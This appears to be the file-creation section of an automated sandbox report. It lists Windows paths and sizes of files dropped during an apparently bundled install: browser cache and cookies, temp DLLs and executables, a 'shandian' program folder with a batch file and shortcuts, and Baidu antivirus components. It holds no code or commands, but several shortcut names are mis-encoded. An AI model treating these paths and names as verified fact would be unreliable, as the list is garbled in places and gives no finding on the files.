%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140528121909_796[1].jpg (186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\v53_arrow_h[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\new-erweima2[1].png (5570 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\20130531144119_126[1].png (3340 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140526170756_638[1].jpg (186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\skin2_0[1].gif (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\citydata[2].js (2772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\cloudy[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\i-ico-2b[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\search_arrow[1].gif (447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\main[2].js (2328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\skin3[1].gif (1266 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (193 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\rec[1].do (374 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\selogo_111207[2].png (1858 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140526163446_912[1].jpg (1264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\mE8bXnNioe2802[1].jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\setting_icon[1].gif (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\setskinbg[1].gif (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\texture[1].gif (1148 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\new-ico[1].png (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\skin_[1].css (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\guide_tip[1].png (2099 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\titlebg[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\main[1].js (3049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\DD_belatedPNG_0.0.8a-min[2].js (254 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\_ads_2[2].js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\img-news[1].gif (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\guide_top[1].jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\v33_sugg_ajaj_v40_3[2].js (1187 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (9640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\v33_sugg_ajaj_v40_3[1].js (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\selogo_111207[1].png (2331 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\hotdata[1].js (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\DD_belatedPNG_0.0.8a-min[1].js (678 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\20140526163242_997[1].jpg (186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\hu.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDMReport.dll.bdl (37083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\g.exe.bdl (658579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDLogicUtils.dll (31856 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (1121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\System.dll (784 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (200 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDMNet.dll.bdl (39524 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDMSkin.dll (36698 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDMNetGetInfo.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\BDMDownload.dll (5520 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb8.tmp (128685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\tmppm4bkx.dll (24832 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl9.tmp\res\onlineWnd.zip (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b17[1].jpg (8043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\Untitled-1[1].gif (4902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\stat[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\style[1].css (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\ico_new2[1].png (11140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa7[1].jpg (1254 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa9[1].jpg (1798 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\aaa1[1].jpg (6743 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\tj[1].js (279 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[2].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\b14[1].jpg (5425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\xinwen[1].htm (881 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa1[1].jpg (7701 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\nvxing_509_366[1].htm (2047 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b19[1].jpg (1055 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\core[1].php (798 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b18[2].jpg (2436 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\aaa6[1].jpg (6809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\lieqi_509_366[1].htm (2049 bytes)
%Program Files%\shandian\bin\update\PopWinParam.xml (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\close[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\cpc_ztyw[1].css (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\b19[1].jpg (2237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\cpc_swf[1].asp (1286 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@70e[1].txt (514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\xinwen[2].htm (881 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\Untitled-3[1].jpg (2926 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (166 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@70e[2].txt (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\b14[1].jpg (6863 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa2[2].jpg (7789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa2[1].jpg (3173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b15[1].jpg (4419 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\meinv[1].htm (882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\nvxing_509_366[1].htm (1591 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\normal_bg[1].png (9772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\core[1].php (798 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\b17[1].jpg (8728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\Close[1].gif (348 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\jiankang_509_366[1].htm (2049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa6[1].jpg (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\jquery-1.7.2.min[1].js (45051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\stat[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa4[1].jpg (14268 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\cpc_img[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\shehui_509_366[1].htm (2049 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@565882[1].txt (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa10[1].jpg (1518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\b13[1].jpg (7942 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (607 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa7[1].jpg (3892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa10[1].jpg (1878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa8[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\b15[1].jpg (7788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\b16[1].jpg (8744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\meinv[1].htm (882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\aaa4[1].jpg (9878 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[2].txt (326 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\Untitled-2[1].gif (1416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b18[1].jpg (2118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\cpc_swf[1].asp (1807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\cpc_img[1].htm (884 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\d[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\jiankang_509_366[1].htm (2049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\aaa5[1].jpg (14586 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa3[1].jpg (5531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\aaa8[1].jpg (1878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\stylemini[1].css (4664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\0[1].gif (17661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\miniindex[1].htm (4605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\min[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\shehui_509_366[1].htm (2049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa3[2].jpg (14482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\2012_swf[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\aaa9[1].jpg (975 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@zhouliboguju[1].txt (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\b13[1].jpg (7144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\lieqi_509_366[1].htm (2049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\jquery-1.7.2.min[1].js (7973 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\aaa5[1].jpg (15401 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\cpv1[1].htm (1117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\b16[1].jpg (8350 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1017 bytes)
%Program Files%\shandian\ico\360.ico (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\stat[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\config0.ini (3 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (1 bytes)
%Program Files%\shandian\home.bat (691 bytes)
%Program Files%\shandian\bin\shandian.exe (28332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\F30241_s_0523.exe (91814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\emaaif_70690[1].rar (12288 bytes)
%Program Files%\shandian\ico\ie.ico (700 bytes)
%Documents and Settings%\%current user%\Desktop\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (505 bytes)
%Program Files%\shandian\config.ini (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2TEZGT87\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\xID.dll (10 bytes)
%Program Files%\shandian\uninst.exe (860 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1JER6H25\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O61T592M\F30241_s_0523[1].rar (91814 bytes)
%Program Files%\shandian\ico\anquan.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\emaaif_70690.exe (12288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\System.dll (11 bytes)
%Program Files%\shandian\ico\taobao.ico (15 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (694 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\config.ini (3 bytes)
%Program Files%\shandian\bin\sdad.exe (12955 bytes)
%Program Files%\shandian\shandian.exe (3121 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0LMNOLE7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·\ÃƒÂÃ‚Â¶Ãƒâ€ÃƒËœÃƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (682 bytes)
%Documents and Settings%\%current user%\Desktop\360Ã‚Â°Ã‚Â²ÃƒË†Ã‚Â«ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\bind.dll (1207 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm5.tmp (911727 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSRCore.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDDownLoadProtectPlugin.dll (12536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSkin.dll (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\DriverManager.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayDldProtect.rdb (6360 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0001.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDPerflog.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDShellExt.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0002.sys (7192 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDCooly.dll (44 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVMainFrame.dll (7345 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMLog.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\licenses\directui license.txt (593 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\bduf.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDPerflog.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\BDMSkin.dll (37025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\811.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\iexplore.exe.xml (528 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDShellExt64.dll (14184 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMAVE.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\SearchProtection.rdb (5064 bytes)
%WinDir%\Fonts (1248 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVEng.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDLogicUtils.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastLogo.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMAVEng.dll (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMAVCached.dll (11048 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\KavUpdate.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDownloadProtect_x64.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\tuopan.png (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdSvc.exe (15536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BSRLib.dat (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMLog.dll (32 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdTray.exe (10815 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray.rdb (19152 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\drivers\bd0002.sys (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\npBaiduSDDetectPlug.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\DesktopToast.exe (3616 bytes)
%WinDir%\WinSxS\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\806.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\iexplore.exe.xml (528 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\tips.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdBugRpt.exe (19152 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Repair_PluginConfig.xml (411 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMFrameWork.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\systemfile.dat (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™\Ã¥ÂÂ¸Ã¨Â½Â½Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™.lnk (944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\wverify.dat (66168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\res\InstallWnd.zip (12536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSkin.dll (37368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\dnw.xml (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ieBaiduSDDetectPlug.dll (4992 bytes)
